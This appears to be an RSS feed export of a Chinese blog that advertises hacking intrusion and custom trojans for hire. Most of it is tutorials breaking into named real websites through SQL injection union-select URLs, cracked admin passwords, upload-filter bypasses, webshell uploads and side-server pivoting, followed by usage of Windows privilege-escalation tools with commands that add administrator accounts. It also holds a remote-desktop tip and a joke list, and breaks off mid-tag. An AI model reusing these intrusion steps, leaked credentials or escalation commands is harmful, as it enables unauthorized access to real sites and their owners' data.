<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>++++++苏坤|工作室|网站开发|二次改版|程序订做|黑客入侵|网站入侵++++++</title><link>http://blog.sukun.net/</link><description>本工作室承接以下业务，黑客入侵，木马订做，服务器维护，SEO网络优化，网站开发，网站二次开发和教学等业务……</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright 辽ICP备09027047号 Your WebSite. Some Rights Reserved.</copyright><pubDate>Thu, 16 Feb 2012 04:24:45 +0800</pubDate><item><title>我远程桌面连接一台windows2003服务器,它提示 要登录到这条远程计算机，您必须拥有这台计算机上的“终端服</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/远程计算机,终端服务.html</link><pubDate>Thu, 16 Feb 2012 04:23:32 +0800</pubDate><guid>http://blog.sukun.net/html/远程计算机,终端服务.html</guid><description><![CDATA[<p>到&quot;控制面板&quot; --&gt; &quot;管理工具&quot; --&gt; &quot;终端服务配置&quot; --&gt; &quot;服务器设置&quot; 在右边框中, 授权&quot;每用户&quot; 改成 &quot;每设备&quot;,<br /><br />处理办法:<br />1. &quot;控制面板&quot; --&gt; &quot;管理工具&quot; --&gt; &quot;终端服务配置&quot;<br />2. 点击&quot;连接&quot;, 右边出现连接项(例如: RDP-Tcp,tcp,Microsoft RDP 5.2)<br />3. 双击要修改的连接项。<br />3. 弹出窗口, 单击&quot;权限&quot;选项卡。<br />4. 单击&quot;高级&quot;，然后单击&quot;添加&quot;。<br />5. 指定要添加的用户或组，使该用户或组能够使用&ldquo;远程控制&rdquo;。<br />6. 添加用户或组之后，将显示权限项 对话框。单击&ldquo;远程控制&rdquo;的答应 列，将其选中。<br />7. 单击确定。<br />8. 单击确定，再次单击确定。</p>]]></description><category>服务器</category><comments>http://blog.sukun.net/html/远程计算机,终端服务.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=182</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=182&amp;key=4e76aae5</trackback:ping></item><item><title>友情检测泸县梁才学校</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/181.html</link><pubDate>Wed, 15 Feb 2012 17:33:40 +0800</pubDate><guid>http://blog.sukun.net/html/181.html</guid><description><![CDATA[<p><br />大家好，我是寂寞，这次做的教程是入侵&nbsp; 泸县梁才学校&nbsp; 的这个网站</p><p><br />群里边有个朋友扔给我一个页面让我帮看看</p><p>&nbsp;</p><p><a href="http://www.lxlcxx.cn/admin/pic.asp">http://www.lxlcxx.cn/admin/pic.asp</a></p><p>&nbsp;</p><p>我打开看了一下是一个上传的页面</p><p>图片类型：jpg,gif,png,bmp，不超过2,000.00KB</p><p>这个是条件</p><p>&nbsp;</p><p>&lt;html&gt;<br />&lt;head&gt;<br />&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=gb2312&quot;&gt;<br />&lt;title&gt;图片上传&lt;/title&gt;<br />&lt;LINK href=SITE.CSS rel=stylesheet&gt;<br />&lt;/head&gt;<br />&lt;body leftmargin=&quot;0&quot; topmargin=&quot;0&quot;&gt;<br />&lt;form name=&quot;form&quot; method=&quot;post&quot; action=&quot;upme2.asp&quot; enctype=&quot;multipart/form-data&quot; &gt;<br />&lt;input type=&quot;hidden&quot; name=&quot;act&quot; value=&quot;upload&quot;&gt;<br />&amp;nbsp;&amp;nbsp;图片文件：&lt;input type=&quot;file&quot; name=&quot;file1&quot; size=10 style=&quot;border: 1px solid #0000FF&quot;&gt;<br />&lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;上传&quot; style=&quot;border: 1px solid #0000FF&quot; &gt;<br />&lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;</p><p>&nbsp;</p><p>查看源代码是所有验证都提交到了&nbsp; method=&quot;post&quot; action=&quot;upme2.asp&quot;&nbsp; 并且是以POST的方式</p><p>&nbsp;</p><p>我们来拿工具试试</p><p>就不多试了，全都不好用，这下我头就疼了，咋办。</p><p>想了又想还是一步一步来吧。先进后台在说</p><p>找注入点</p><p>这是存在注入的</p><p><br />过程我就不给大家详细讲了，我全是手工注入不用工具，工具太慢了</p><p><br />得到的用户是</p><p><br />帐号：admin</p><p>密码：7652bd870b7cecb0&nbsp;&nbsp;&nbsp;&nbsp; 这个确解的密码是wang123456</p><p><br />后台地址</p><p>其实这里跳过了一点，我给大家讲一下。</p><p>字段是查不到的，怎么能查到。</p><p>仔细看好</p><p><a href="http://www.lxlcxx.cn/admin/admin.asp">http://www.lxlcxx.cn/admin/admin.asp</a>&nbsp;&nbsp; 这个是登陆后台的地址</p><p><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;p align=&quot;center&quot;&gt;&lt;span class=&quot;style2&quot;&gt;登录帐号&lt;/span&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input name=&quot;m_user&quot; type=&quot;text&quot; id=&quot;m_user&quot;&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/p&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;p align=&quot;center&quot;&gt;&lt;span class=&quot;style2&quot;&gt;登录密码&lt;/span&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input name=&quot;m_pass&quot; type=&quot;password&quot; id=&quot;m_pass&quot;&gt;</p><p>&nbsp;</p><p>&nbsp;name=&quot;m_user&quot;</p><p>&nbsp;&nbsp; name=&quot;m_pass&quot;</p><p><br />明白了吧</p><p><br />不细讲了，我的博客上有基础的教程</p><p>废话说多了，接着讲</p><p><br />进入后台</p><p><br />进入成功了。</p><p><br />下一步咋办，找上传的地方，或者其它可行的地方。</p><p><br />哎，，，，，，这里说一下，今天是我生日特别郁闷，自己一个人。郁闷死。。。。。。。。。有没有谈心的交心的朋友可以跟我联系</p><p>我的QQ42494149</p><p><br />继续</p><p><br />不行的。</p><p>其它我找了半天，有一个问题。</p><p>大家看啊。</p><p><a href="http://www.lxlcxx.cn/admin/addlogo.asp">http://www.lxlcxx.cn/admin/addlogo.asp</a>&nbsp;&nbsp; 这个程序是没有验证的，可以直接打开，提醒一个管理员把这个漏洞修复一下。</p><p>这个页面有上传的地方，大家看好。</p><p>呵呵郁闷了，自己的马，密码不知道是啥了，愁死。</p><p>看到了吧，鄙视一下管理员。只认JPG格式的，他就不知道有IIS解析漏洞</p><p>多郁闷</p><p>这是其中的一种办法</p><p>我们换种方法</p><p>我们就用这个页面。先看一下源代码</p><p>跟大家分析一下。</p><p>&lt;script language=&quot;JavaScript&quot;&gt;<br />&lt;!--</p><p>function getFileExtension(filePath) { //v1.0<br />&nbsp; fileName = ((filePath.indexOf('/') &gt; -1) ? filePath.substring(filePath.lastIndexOf('/')+1,filePath.length) : filePath.substring(filePath.lastIndexOf('\\')+1,filePath.length));<br />&nbsp; return fileName.substring(fileName.lastIndexOf('.')+1,fileName.length);<br />}</p><p>function checkFileUpload(form,extensions) { //v1.0<br />&nbsp; document.MM_returnValue = true;<br />&nbsp; if (extensions &amp;&amp; extensions != '') {<br />&nbsp;&nbsp;&nbsp; for (var i = 0; i&lt;form.elements.length; i++) {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; field = form.elements[i];<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (field.type.toUpperCase() != 'FILE') continue;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (field.value == '') {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; alert('文件框中必须保证已经有文件被选中!');<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; document.MM_returnValue = false;field.focus();break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (extensions.toUpperCase().indexOf(getFileExtension(field.value).toUpperCase()) == -1) {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; alert('这种文件类型不允许上传!.\n只有以下类型的文件才被允许上传: ' + extensions + '.\n请选择别的文件并重新上传.');<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; document.MM_returnValue = false;field.focus();break;<br />&nbsp; } } }<br />}<br />//--&gt;<br />&lt;/script&gt;</p><p><br />&nbsp;//&nbsp; 这块是验证允许上传的方式</p><p>&nbsp;</p><p><br />&lt;script&gt;<br />function del ()&nbsp; //用于判断记录有没有选中的函数<br />{<br />var flag=true;<br />var temp=&quot;&quot;;<br />var&nbsp; tmp;<br />if((document.form5.answer.length+&quot;&quot;)==&quot;undefined&quot;) {tmp=1}else{tmp=document.form5.answer.length}<br />if (tmp==1){<br />if (document.form5.answer.checked){<br />&nbsp;&nbsp;&nbsp; flag=false;<br />&nbsp; temp=document.form5.answer.value<br />}<br />}else{<br />for (i=0;i&lt;document.form5.answer.length;i++) {<br />if (document.form5.answer[i].checked){<br />if (temp==&quot;&quot;){<br />flag=false;<br />temp=document.form5.answer[i].value<br />}else{<br />flag=false;<br />temp = temp +&quot;,&quot;+ document.form5.answer[i].value<br />}<br />}<br />}<br />}<br />if (flag){ alert(&quot;对不起，你还没有选择！&quot;)}<br />else{&nbsp;&nbsp; name=document.form5.name.value<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //alert(name)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (confirm(&quot;确实要删除？&quot;)){<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; window.location=&quot;dellogo.asp?id=&quot; + temp;<br />}<br />}<br />return !flag;<br />}<br />&lt;/script&gt;</p><p><br />这块说实话对于黑客没啥大用。</p><p>&nbsp;</p><p>这块是用JavaScript&nbsp; 验证上传的类型，所以这不必担心。</p><p>那我们想，跟我之前做过的一个教程是一样儿的，如果把他删除了，直接提交给那个页面是不是就成功了呢？？？？</p><p><br />&lt;form action=&quot;/admin/addlogo.asp?GP_upload=true&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; name=&quot;form1&quot; onSubmit=&quot;checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG,SWF');checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG,swf');checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG,swf');checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG,SWF');return document.MM_returnValue&quot;&gt;</p><p><br />好了，我们必完了，看能不能突破上传呢？？</p><p>看好啊。</p><p>好了，教程就到这样儿，小马已经上去了，大马我就不传了。</p><p>打个广告，小弟的博客&nbsp;&nbsp; <a href="http://blog.sukun.net/">http://blog.sukun.net/</a>&nbsp;&nbsp;&nbsp; 谢谢大家支持&nbsp; 88<br /><embed mediatype="0" type="application/x-mplayer2" pluginspage="http://microsoft.com/windows/mediaplayer/en/download/" src="http://blog.sukun.net/jiaocheng/lxlc.wmv" width="500" height="500" autostart="false" loop="false" menu="true"></embed></p>]]></description><category>黑客技术</category><comments>http://blog.sukun.net/html/181.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=181</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=181&amp;key=3c70006f</trackback:ping></item><item><title>友情检测</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/180.html</link><pubDate>Tue, 14 Feb 2012 19:12:34 +0800</pubDate><guid>http://blog.sukun.net/html/180.html</guid><description><![CDATA[<p>目标网站：www.ccpcct.com</p><p><br />http://www.ccpcct.com/.txt</p><p>&nbsp;</p><p><br />大家好我是寂寞&nbsp;&nbsp; 好久都没给大家做教程了。今天群里有一个朋友说有一个网站拿不下来。</p><p>我就试了一下。</p><p>不多打字废话了。看教程吧</p><p><br />是一个ASP程序的网站看一下后台</p><p>http://www.ccpcct.com/admin/login.asp&nbsp; 后台可以找得到</p><p>默认的密码都不会</p><p>那只好看看有没有注入点了。</p><p>做了防注入系统</p><p>我们来突破一下子。</p><p>这个是我之前改好的，不懂的朋友不用着急。</p><p>我会有一套的系列教程将在最近出，做一个论坛，目前正在建设中。</p><p><br />不好意思，接着讲。</p><p>看一样儿吧。我们来手工注入</p><p>为什么找这么准？&nbsp;&nbsp; 我之前已经把这个网站入侵了</p><p><br />所以大家慢慢来。没什么技术含量。</p><p>http://localhost/zr/zr.asp?jimo=370 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin</p><p>http://localhost/zr/zr.asp?jimo=370 union select 1,2,adminname,4,password,6,7,8,9,10,11,12,13,14,15,16,17 from admin</p><p>表没有改是默认的</p><p>看到没有，是字段改了</p><p>不怕，我已经知道了</p><p><br />adminname:ccpcct <br />password:037989</p><p>&nbsp; 呵呵，密码还是明文呢。哎，服了我们现在来登陆一下子吧。</p><p>第一步搞定了。</p><p><br />那后台进去了，现在我们的目的还不行</p><p>有上传功能。</p><p>大家看一下这个网站</p><p><a href="http://www.ccpcct.com/admin/News/upload_Photo.asp">http://www.ccpcct.com/admin/News/upload_Photo.asp</a></p><p><a href="http://www.ccpcct.com/admin/News/Upfile_Photo.asp">http://www.ccpcct.com/admin/News/Upfile_Photo.asp</a></p><p><br />一般大家看到这个都会想到抓包，欺骗上传拿到shell对吧。<br />我们来试一下子</p><p><br />他这个页面根本就没有认证，可以直接来利用&nbsp; 大家可以学习一下，写程序时一定要做好安全的设置</p><p>而且我看了，不光这个页面，其它的页面只有这个没有做认证，不知道自己开发的这套程序还有这个问题。</p><p>大家看一下是不是某个网络公司给他们做的。</p><p>不仔细找了，大家自己查吧，如果查到某个网络公司，嘿嘿。我可啥都没说啊。。</p><p><br />话题远了。</p><p>alert('这种文件类型不允许上传！\n\n只允许上传这几种文件类型：JPG|GIF|PNG|BMP|DOC|TXT|RAR|XLS|flv|swf')<br />alert('文件大小超过了限制，最大只能上传K的文件！');</p><p>alert('文件大小超过了限制，最大只能上传K的文件！')</p><p>&nbsp;</p><p>记下这两句话，做网络安全也好，玩小黑也好，一定要多留心，说不定哪句话就对你有帮助。</p><p>我们看看还有没有其它的方法</p><p><br />ewebeditor编辑器</p><p>呵呵乐了吧。</p><p>这个可以利用，我们来试试</p><p><br />点这个让我想到了二个问题&nbsp;&nbsp; 第一这个编辑器肯定是改过的，要不然正常的只支持IE7的&nbsp;&nbsp; 不支持这个360</p><p>那么我们来看一下怎么利用</p><p>不允许，这里我试了，asp&nbsp; aspx&nbsp; asa都不行</p><p>看一下源码</p><p>&lt;iframe id=&quot;eWebEditor1&quot; src=&quot;../Southidceditor/ewebeditor.asp?id=content1&amp;style=southidc&quot; frameborder=&quot;0&quot; scrolling=&quot;no&quot; width=&quot;560&quot;</p><p>height=&quot;350&quot;&gt;&lt;/iframe&gt;</p><p><br /><a href="http://www.ccpcct.com/admin/Southidceditor/admin_style.asp">http://www.ccpcct.com/admin/Southidceditor/admin_style.asp</a></p><p>这个是加入浏览器的代码&nbsp; 我们可以找到这个路径，可以利用自己手动构建一个</p><p>好了，我们来测试一下这个路径是否存在呢？</p><p>说明是存在的，但得需要认证，但是有一个问题，咱们现在后台已经登陆了，所以不存在cookies的问题。</p><p>那么我们来引用一下子呢？</p><p><br />看到了吧。证明我说的没错吧。</p><p>又失败了，咋办？？？？？？？？？？？？？？</p><p>开始头疼了吧。</p><p>耐心点，在找找。</p><p>站点物理路径：d:\www\Web1317505\wwwroot\&nbsp;&nbsp; 记下有用的信息</p><p>看到了没有，我说是网络公司做的吧。</p><p>哈哈&nbsp;&nbsp;&nbsp; 服了。<br /><a href="http://www.tz0523.cn/news_info.asp?nid=559">http://www.tz0523.cn/news_info.asp?nid=559</a>&nbsp;&nbsp;</p><p>先记下他。但大家可千万别搞破坏去。后果我可不负责</p><p>谁肯定检测过。</p><p>我现在想到了一句话木马，不知道可用不</p><p>这个是我之前测试的，没用。</p><p>但问题到这儿了，没办法了吗？</p><p>我也头疼，但这时我想到了旁注</p><p>大家知道，只要搞定同一服务器里面的任何网站提权成功达到的目的都是一样儿的。</p><p>这么多。<br /><a href="http://www.0514qh.com/admin/Login.asp">http://www.0514qh.com/admin/Login.asp</a></p><p>这个站。<br />我进去了。</p><p>呵呵，不多讲了，我拿到了shell</p><p>大家看一下，思路是不是有点清楚了呢？</p><p>看是同一服务器的吧。我们看一下能不能跳过他的那个路径</p><p>找找刚刚记下的信息</p><p>跳不过去，这是做的权限，防止跳转的。</p><p>每个网站都做一个针对的用户来管理。</p><p>我的网络安全课程会出的。</p><p>晕了吧。<br />来到了F盘</p><p>哎，真是服了。</p><p>哈哈，更是晕了。干嘛用的？</p><p>网站备份的目录，大侠呀咋回事儿？</p><p><br />大侠呀，我真服了。</p><p><br />一目了然了吧。</p><p>dbstr=&quot;<a href="mailto:#$@d~a(t#a^/db.mdb">#$@d~a(t#a^/db.mdb</a>&quot;</p><p>大姐大哥求你了</p><p>我的整套安全教程里有这一点针对性</p><p><br />我们来看一下刚刚上传接收的那个文件咋写的程序吧</p><p><br />&lt;!--#include file = &quot;Include/Startup.asp&quot;--&gt;<br />&lt;!--#include file = &quot;admin_private.asp&quot;--&gt;</p><p>&nbsp;</p><p><br />if fileEXT&lt;&gt;&quot;jpg&quot; and fileEXT&lt;&gt;&quot;gif&quot; and fileEXT&lt;&gt;&quot;bmp&quot; and fileEXT&lt;&gt;&quot;swf&quot; and fileEXT&lt;&gt;&quot;png&quot; and fileEXT&lt;&gt;&quot;flv&quot; then<br />&nbsp;&nbsp;&nbsp;msg=&quot;这种文件类型不允许上传！\n\n只允许上传这几种文件类型：&quot; &amp; uploadtype<br />&nbsp;&nbsp;&nbsp;FoundErr=true<br />&nbsp;&nbsp;end if</p><p><br />IF语句&nbsp;&nbsp; 如果不是jpg&nbsp; gif&nbsp; bmp&nbsp; swf png flv的格式，那么&nbsp; 弹出&quot;这种文件类型不允许上传！\n\n只允许上传这几种文件类型：&quot; &amp; uploadtype</p><p><br />所以知道了吧。</p><p>我们来传一下&nbsp; cer&nbsp; php&nbsp; aspx的</p><p><br />大小超过了</p><p>晕，又太小了，服了。</p><p>这个大家一起去测试吧。</p><p>我的方法是找到了一个这样儿的文件。</p><p>Uppic.asp&nbsp;&nbsp; 看看</p><p>&lt;form action=&quot;upsavepic.asp&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; name=&quot;form1&quot;&gt;&nbsp;&nbsp; action=upsavepic.asp</p><p>这个也是上传的文件，但后台没有显示</p><p>我们来利用一下</p><p><a href="http://www.ccpcct.com/admin/inc/upsavepic.asp">http://www.ccpcct.com/admin/inc/upsavepic.asp</a></p><p>不行，呵呵。</p><p>在看一下。&nbsp;&nbsp; 用的JavaScript过滤的&nbsp; 并不是调用asp文件或者ini</p><p>Upsavepic.asp&nbsp; 看看接收的页面</p><p>dim upload,file,fpath,filename,fileext<br />set upload=new UpFile_Class '建立对像<br />n=10240&nbsp; <br />sizes=n*1024<br />'300kb大小<br />upload.getdate(sizes)</p><p>if upload.err&gt;0 then<br />select case upload.err<br />case 1<br />Response.Write &quot;请先选择你要上传的文件　[ &lt;a href=# onclick=history.go(-1)&gt;重新上传&lt;/a&gt; ]&quot;<br />case 2<br />&nbsp;Response.Write &quot;文件大小超过了限制 &quot;&amp;n&amp;&quot;K　[ &lt;a href=# onclick=history.go(-1)&gt;重新上传&lt;/a&gt; ]&quot;</p><p>定义了大小</p><p>定义了类型</p><p>if fileext=&quot;asp&quot; or fileext=&quot;aspx&quot; or fileext=&quot;asa&quot; then <br />checkfileext(fileext)=false<br />end if</p><p>定义了目录<br />fpath=upload.form(&quot;filepath&quot;)<br />if right(fpath,1)&lt;&gt;&quot;/&quot; then fpath=fpath&amp;&quot;/&quot;</p><p>for each formname in upload.file '列出上传的文件<br />set file=upload.file(formname) '生成文件对象<br />fileext=lcase(file.fileExt)</p><p><br />filepic=&quot;.gif.jpg.png.bmp.jpeg.rar.zip.exe.doc.xls.chm.hlp.pdf.swf.csv&quot;</p><p>好了，呵呵</p><p>&quot;asp&quot; or fileext=&quot;aspx&quot; or fileext=&quot;asa&quot;&nbsp;&nbsp; .gif.jpg.png.bmp.jpeg.rar.zip.exe.doc.xls.chm.hlp.pdf.swf.csv</p><p>看完了，大家分析一下，只要不是这些后缀是不是都可以了？</p><p>漏洞就出来了</p><p>cer php 等吧都可以吧。</p><p>而且还有一个问题。</p><p>如果用的JavaScript过滤的&nbsp; 我们可以设置一下IE，屏蔽一下就可以了。</p><p>那我们来传一下PHP吧</p><p>满足条件是大小要不得0K&nbsp; 不得超过&nbsp; n=10240&nbsp;&nbsp;&nbsp; sizes=n*1024&nbsp;&nbsp; 所以我们来测试一下子吧。</p><p>这个是我之前就传上去的，不骗大家，我删除</p><p>好了吧</p><p>晕死，</p><p>路径有问题？呵呵。不好意思。</p><p><a href="http://www.ccpcct.com/admin/inc/upsavepic.asp">http://www.ccpcct.com/admin/inc/upsavepic.asp</a></p><p>成功了，我删除，大家在看一下。</p><p>看成功了吧。</p><p>好了，教程有点大了，仔细观察，</p><p>我的博客&nbsp; <a href="http://blog.sukun.net">http://blog.sukun.net</a>&nbsp;&nbsp;&nbsp;&nbsp; 接点小业务，做服务器安全，网站制作，SEO等等吧。详细的可以找我，88&nbsp;</p><p><embed mediatype="0" type="application/x-mplayer2" pluginspage="http://microsoft.com/windows/mediaplayer/en/download/" src="http://blog.sukun.net/jiaocheng/yqjc.wmv" width="400" height="400" autostart="false" loop="false" menu="true"></embed></p>]]></description><category>黑客技术</category><comments>http://blog.sukun.net/html/180.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=180</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=180&amp;key=fbf5d243</trackback:ping></item><item><title>你愿意嫁一个这个的人吗？</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/179.html</link><pubDate>Tue, 14 Feb 2012 11:45:50 +0800</pubDate><guid>http://blog.sukun.net/html/179.html</guid><description><![CDATA[<p>1.专一的心，除了计算机就是你！<br />2.喝酒绝对不发脾气！<br />3.一套名牌只穿一个月!<br />4.没时间接触其它Girl，想搞婚外恋也没可能。<br />5.夜晚时总加班，所以白天一定会怀着一颗愧疚的心在家陪老婆逛街、看电视、聊天、做家务。<br />6.只认识0和1，基本没理财能力，一定会主动把所有的钱都交给老婆管，还会千恩万谢地。<br />7.知道既然世界上不存在没有Bug的程序，就更加不会有没有缺点的人，所以绝不会老婆太过 苛求。<br />8.知道系统若不经常维护就无法保持稳定运行，所以一定会每天都对老婆精心呵护。<br />9.会帮老婆把菜谱改写成if&hellip;then&hellip;do while的格式，并且带有漂亮的缩进。<br />10.老婆可以对所有的表弟、表妹宣称：&ldquo;你们的毕业证书我全包了&hellip;&hellip;&rdquo;<br />11.老婆的QQ不好用了，为老婆架设一个属于你们自己的聊天室&hellip;<br />12.如果将来小孩不爱学习，老婆就可以教育他说：&ldquo;再不用功，将来就会像你老爹那样，只能做黑客&hellip;&hellip;&rdquo;<br />13.如果将来小孩沉迷网游，老婆就可以埋汰他说：&ldquo;你还在玩被你老爸黑过的那个破游戏呐？&rdquo;<br />14.如果将来小孩嫌背单词不给力，老婆就可以把存在漏洞的程序代码拿给他看：&ldquo;看你老爹每天要挖出多少这种漏洞啊？！&rdquo;<br />15.嫁给瘦弱的黑客，也许永远无法目睹他像李连杰那样以一敌十的英姿，却也会听到他吼道：&ldquo;哪个孙子又在QQ上骂你呐？看我不盗了她的号&hellip;&hellip;&rdquo;<br />16.嫁给黑客，以后他会为你带上一颗耀眼的钻戒，开着奔驰 宝马送孩子上学。<br />17.对色彩和流行毫无感觉。所以当老婆从试衣间里走出来的时候，他会故作沉思状地摸摸下巴，然后随机从数组[&quot;很可爱&quot;,&quot;显得你更高挑了&quot;,&quot;显得你更文雅了&quot;,&quot;哇，好性感！&quot;,&quot;好像不太适合你这么瘦的女孩子&quot;,&quot;好清纯！&quot;,&quot;这颜色最适合你这样皮肤好的女孩子了&quot;,&quot;天哪，穿在你身上就是不一 样！&quot;]中选择一个Item。<br />18.每个月除了买衣服喝酒吸烟以外，就没有其它需要花钱的地方，剩下的钱只能变着法的给老婆买各种首饰和衣服。<br />19.每天日站日到深夜，是孩子学习的好榜样。<br />20.每天都为挖Bug，调试0Day双重折磨。有极好的耐心和涵养，就算跟老婆吵架也能保持温柔和冷静，不太可能说出不理智的话伤了老婆的心。-</p>]]></description><category>心情日记</category><comments>http://blog.sukun.net/html/179.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=179</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=179&amp;key=b08ec321</trackback:ping></item><item><title>pr.exe、Churrasco.exe、ms10048.exe用法及提权原理</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/pr.exe,cc.exe,提权.html</link><pubDate>Thu, 09 Feb 2012 13:29:22 +0800</pubDate><guid>http://blog.sukun.net/html/pr.exe,cc.exe,提权.html</guid><description><![CDATA[<p>1.Churrasco.exe是Windows2003系统下的一个本地提权漏洞，通过此工具可以以SYSTEM权限执行命令，从而可以达到添加用户的目的。</p><p>&nbsp;</p><p>使用方法：</p><p>Churrasco.exe &quot;net user&nbsp;admin1&nbsp;admin1 /add &amp;&amp; net localgroup administrators&nbsp;admin1 /add&quot;</p><p>补丁名：kb952004</p><p>2.pr.exe 提权Windows跟踪注册表项的ACL权限提升漏洞<br />Windows管理规范（WMI）提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程，同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌，如果攻击者可以以 NetworkService或LocalService帐号访问计算机，攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌，就可以获得SYSTEM权限的提升。</p><p>使用方法:</p><p>pr.exe &ldquo;gets.exe $local&rdquo;</p><p>pr.exe &ldquo;net user admin1 admin1 /add &amp; net localgroup administrators admin /add&rdquo;</p><p><span><img class="blogimg" src="http://hiphotos.baidu.com/hc%C3%F7%C3%F78888/pic/item/64ce5f1d3bc6639aae51333d.jpg" small="0" alt="" /></span><br /><span><br /></span><span style="color: #444444"><span><br /><span><img class="blogimg" src="http://hiphotos.baidu.com/hc%C3%F7%C3%F78888/pic/item/5e376cfc07816dbeb58f313d.jpg" small="0" alt="" /></span><br /><br /></span><span style="font-family: Verdana"><br /></span></span><span style="color: #444444"><span style="color: #333333"><span><span><span style="font-size: 12px"><span><span><span><span style="font-family: Verdana; font-size: 12px"><span>release.exe是release版编译生成的<br />debug.exe是debug版编译生成的<br />测试时直接通过wscript.shell调用<br />debug版的有回显，release的没有回显,两个都发出来个大家测试下</span></span></span></span></span></span></span></span></span></span></p><p>&nbsp;</p><p>3.ms10048提权</p><p>&nbsp;</p><p>Windows中的win32k.sys内核驱动中的xxxCreateWindowEx函数在处理某些回调参数时存在内核级权限提升漏洞。在正常情况下从用户空间调用CreateWindow时，会执行NtUserCreateWindowEx内核函数，xxxCreateWindowEx位于内核端调用栈上的临近位置。之后的函数会检查回调函数（或钩子）并调用xxxCallHook将注册的回调函数分发到用户空间。<br />用于将参数传送回创建窗口的进程的机制存在漏洞。这些参数通过栈传送到了用户空间，并在执行了回调函数后被内核重用。如果回调函数将hParent参数重置为类似于0xffffffff或0xfffffffe的伪句柄值，内核就会崩溃。<br />成功利用这个漏洞的攻击者可以执行任意内核态代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。</p><p>使用方法：</p><p>USE MS10048.EXE NET USER XX XX /ADD<br />USE MS10048.EXE MUMA.EXE<br />第一个是X64位，第二个是X86<br /><a href="http://www.mvphack.net/article/UploadPic/2010-11/2010112431746991.jpg" target="_blank"><img style="cursor: pointer" src="http://hiphotos.baidu.com/hc%C3%F7%C3%F78888/pic/item/6c7062d81e5f123495ee373d.jpg" width="371" height="390" alt="" />&nbsp;</a>&nbsp;</p><p><a href="http://www.mvphack.net/article/UploadPic/2010-11/2010112431747595.jpg" target="_blank"><img style="cursor: pointer" src="http://hiphotos.baidu.com/hc%C3%F7%C3%F78888/pic/item/23df08230ee1c20035a80f3d.jpg" width="354" height="409" alt="" />&nbsp;</a></p><p><a href="http://www.mvphack.net/article/UploadPic/2010-11/2010112431747982.jpg" target="_blank"><img style="cursor: pointer" src="http://hiphotos.baidu.com/hc%C3%F7%C3%F78888/pic/item/7f10cd668078c0bf8cb10d3d.jpg" width="501" height="482" alt="" 